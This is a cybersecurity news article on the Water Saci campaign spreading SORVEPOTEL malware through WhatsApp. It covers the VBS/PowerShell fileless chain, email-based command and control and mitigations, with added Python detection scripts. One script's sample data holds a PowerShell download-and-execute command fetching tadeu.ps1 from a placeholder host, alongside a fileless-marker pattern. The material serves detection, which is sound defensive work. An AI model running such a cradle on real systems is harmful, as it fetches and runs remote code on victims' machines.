Water Saci Hackers Exploit WhatsApp to Deploy Persistent SORVEPOTEL Malware
In a recent cybersecurity development, a sophisticated malware campaign known as Water Saci has been identified, targeting Brazilian users through the popular messaging platform WhatsApp. This campaign utilizes the SORVEPOTEL malware, demonstrating advanced techniques in propagation, persistence, and command-and-control operations.
Emergence and Evolution of the Water Saci Campaign
First detected in September 2025, the Water Saci campaign has rapidly evolved, showcasing a shift from traditional .NET-based attack methods to more complex script-based techniques. By October 2025, cybersecurity analysts observed a significant transformation in the malware’s delivery mechanism, indicating a strategic adaptation to evade detection and enhance infection rates.
Exploitation of WhatsApp for Malware Distribution
A notable aspect of the Water Saci campaign is its exploitation of WhatsApp as the primary vector for malware distribution. Compromised accounts are used to automatically send malicious ZIP files to all contacts and groups associated with the infected user. This method not only facilitates rapid propagation but also leverages the trust inherent in personal communications, increasing the likelihood of recipients opening the malicious files.
Technical Breakdown of the Attack Chain
The infection process begins when a user downloads and extracts a malicious ZIP archive received via WhatsApp. This archive contains an obfuscated Visual Basic Script (VBS) downloader named Orcamento.vbs. Upon execution, this script runs a PowerShell command designed for fileless execution, a technique that loads and runs code directly in memory, thereby evading traditional file-based detection methods.
The PowerShell script, referred to as tadeu.ps1, is retrieved from a remote server and executed in memory. This script is responsible for downloading and executing additional payloads, further embedding the malware in the system. The combination of fileless execution and script-based payloads represents a significant advancement in malware tactics, complicating both detection and remediation.
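The attack chain above (a VBS host process spawning PowerShell that pulls a script into memory) can be hunted for in process-creation telemetry. The following is an added detection example, not code from the article or from the campaign itself; the events are constructed in the style of a Sysmon Event ID 1 export, and the download URL is a placeholder because the article does not name the remote server.

```python
import re

# Constructed process-creation events (not from the article). The Orcamento.vbs
# name comes from the article; the path, PIDs and URL are placeholders.
EVENTS = [
    {"pid": 4120, "ppid": 3988, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Downloads\Orcamento\Orcamento.vbs"'},
    {"pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
                r"-Command \"IEX (New-Object Net.WebClient).DownloadString("
                r"'http://placeholder.invalid/tadeu.ps1')\""},
    # Benign administrative PowerShell launched from explorer.exe, included as a control.
    {"pid": 5001, "ppid": 900,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"pid": 900, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}
# Command-line fragments typical of in-memory (fileless) script loading.
FILELESS_MARKERS = re.compile(
    r"downloadstring|\biex\b|invoke-expression|frombase64string"
    r"|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)?\s+bypass",
    re.IGNORECASE,
)


def basename(path):
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_script_to_powershell(events):
    """Flag PowerShell processes whose parent is a script host and whose
    command line carries fileless-execution markers."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) not in POWERSHELL_HOSTS:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        markers = sorted({m.group(0).lower() for m in FILELESS_MARKERS.finditer(e["cmdline"])})
        if markers:
            hits.append({"pid": e["pid"], "parent_cmdline": parent["cmdline"], "markers": markers})
    return hits


if __name__ == "__main__":
    for hit in find_script_to_powershell(EVENTS):
        print(f"pid {hit['pid']} from {hit['parent_cmdline']}: {', '.join(hit['markers'])}")
```

The parent-child pairing matters more than any single flag: a hidden-window PowerShell with an execution-policy bypass is common in administration, but one spawned by wscript.exe from a freshly extracted archive is the pattern described here.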
Command-and-Control Infrastructure and Persistence Mechanisms
SORVEPOTEL employs a dual-channel communication architecture that sets it apart from conventional malware. Instead of relying solely on HTTP-based command-and-control (C&C) servers, it utilizes IMAP connections to access email accounts hosted on terra.com.br using hardcoded credentials. This email-based C&C infrastructure provides resilience against disruptions, as it allows attackers to issue commands and receive data through standard email protocols.
To maintain persistence on infected systems, the malware modifies registry entries and creates scheduled tasks. Specifically, it installs a VBS script named WinManagers.vbs in the C:\ProgramData\WindowsManager\ directory. This script ensures that the malware remains active, even after system reboots or attempts to remove it.
The backdoor component of SORVEPOTEL is programmed to check the designated email inbox every thirty minutes, extracting various types of URLs, including primary data endpoints, backup infrastructure links, and additional PowerShell payload delivery addresses. This systematic approach ensures continuous communication with the attackers and the ability to receive updated instructions or payloads as needed.
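Because the backdoor polls its mailbox on a fixed thirty-minute cycle over IMAP, the C&C channel shows up in outbound connection logs as a regular beacon rather than as HTTP traffic. The example below is added here and is not from the article: it parses a constructed firewall-style connection log and flags IMAP sessions whose inter-connection gaps cluster tightly around the expected interval. The article gives only the terra.com.br domain, so the IMAP hostname, source addresses and timestamps are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median, pstdev

# Constructed outbound connection log: "<utc timestamp> <src ip> <dst host> <dst port>".
# The host imap.terra.com.br is an assumed name under the domain the article cites.
FLOW_LOG = """\
2025-10-14T08:00:05Z 10.0.0.23 imap.terra.com.br 993
2025-10-14T08:12:40Z 10.0.0.23 updates.example.invalid 443
2025-10-14T08:30:07Z 10.0.0.23 imap.terra.com.br 993
2025-10-14T09:00:04Z 10.0.0.23 imap.terra.com.br 993
2025-10-14T09:30:09Z 10.0.0.23 imap.terra.com.br 993
2025-10-14T10:00:06Z 10.0.0.23 imap.terra.com.br 993
2025-10-14T08:05:00Z 10.0.0.42 mail.example.invalid 993
2025-10-14T08:47:00Z 10.0.0.42 mail.example.invalid 993
2025-10-14T11:10:00Z 10.0.0.42 mail.example.invalid 993
"""

IMAP_PORTS = {143, 993}
EXPECTED_INTERVAL = timedelta(minutes=30)  # polling cadence reported in the article


def parse_flows(text):
    """Group connection timestamps by (source, destination host, port)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        ts, src, dst, port = line.split()
        flows[(src, dst, int(port))].append(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"))
    return flows


def find_imap_beacons(text, expected=EXPECTED_INTERVAL, tolerance_s=60, min_connections=4):
    """Return IMAP flows whose median gap is near `expected` with low jitter.
    Normal mail clients are bursty and user-driven; a scheduled backdoor is not."""
    alerts = []
    for (src, dst, port), times in parse_flows(text).items():
        if port not in IMAP_PORTS or len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med, jitter = median(gaps), pstdev(gaps)
        if abs(med - expected.total_seconds()) <= tolerance_s and jitter <= tolerance_s:
            alerts.append({"src": src, "dst": dst, "port": port, "connections": len(times),
                           "median_gap_s": med, "jitter_s": round(jitter, 1)})
    return alerts


if __name__ == "__main__":
    for a in find_imap_beacons(FLOW_LOG):
        print(f"{a['src']} -> {a['dst']}:{a['port']} every ~{a['median_gap_s']}s ({a['connections']} sessions)")
```

The timing test is a hunting lead, not proof: confirm a hit by checking whether the account on that mailbox belongs to the user, and whether the process owning the socket is a script host rather than a mail client.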
Operational Capabilities and Potential Impact
The SORVEPOTEL backdoor is equipped with over twenty distinct commands, granting attackers comprehensive control over compromised systems. These commands include:
– System Information Gathering: Collecting detailed data about the infected machine, such as operating system version, hardware specifications, and network configurations.
– Process Management: Listing, starting, stopping, or modifying running processes, allowing attackers to manipulate system operations.
– Screenshot Capture: Taking snapshots of the user’s screen to monitor activities or capture sensitive information.
– File Operations: Reading, writing, deleting, or transferring files, enabling data theft or the introduction of additional malicious components.
– System Power Control: Shutting down, restarting, or putting the system into sleep mode, which can be used to disrupt operations or evade detection.
These capabilities position SORVEPOTEL as a full-featured backdoor with sophisticated operational flexibility. The potential impact includes unauthorized access to sensitive information, disruption of business operations, and the establishment of a botnet comprising infected machines under the attackers’ control.
Mitigation Strategies and Recommendations
Given the advanced nature of the Water Saci campaign and the SORVEPOTEL malware, it is imperative for individuals and organizations to adopt robust cybersecurity measures:
1. Exercise Caution with Unsolicited Messages: Be wary of unexpected messages, even from known contacts, especially those containing attachments or links. Verify the authenticity of such communications through alternative channels before opening any files.
2. Implement Advanced Endpoint Protection: Utilize security solutions capable of detecting and mitigating fileless malware and script-based attacks. Regularly update these tools to ensure they can identify the latest threats.
3. Regular Software Updates: Keep operating systems, applications, and security software up to date to patch vulnerabilities that could be exploited by malware.
4. User Education and Awareness: Conduct training sessions to educate users about the risks associated with phishing and social engineering tactics. Encourage a culture of skepticism and verification when dealing with digital communications.
5. Monitor Network Traffic: Implement network monitoring to detect unusual patterns or communications that may indicate malware activity. Pay particular attention to outbound connections to unfamiliar domains or IP addresses.
6. Email Security Measures: Given the malware’s use of email-based C&C channels, ensure that email security protocols are robust. This includes monitoring for unauthorized access, implementing multi-factor authentication, and regularly reviewing email account activity.
Conclusion
The Water Saci campaign underscores the evolving landscape of cyber threats, where attackers continuously refine their methods to bypass security measures and exploit widely used platforms like WhatsApp. The deployment of SORVEPOTEL malware through such channels highlights the need for heightened vigilance and proactive security practices. By understanding the tactics employed in this campaign and implementing comprehensive defense strategies, users and organizations can better protect themselves against similar sophisticated threats.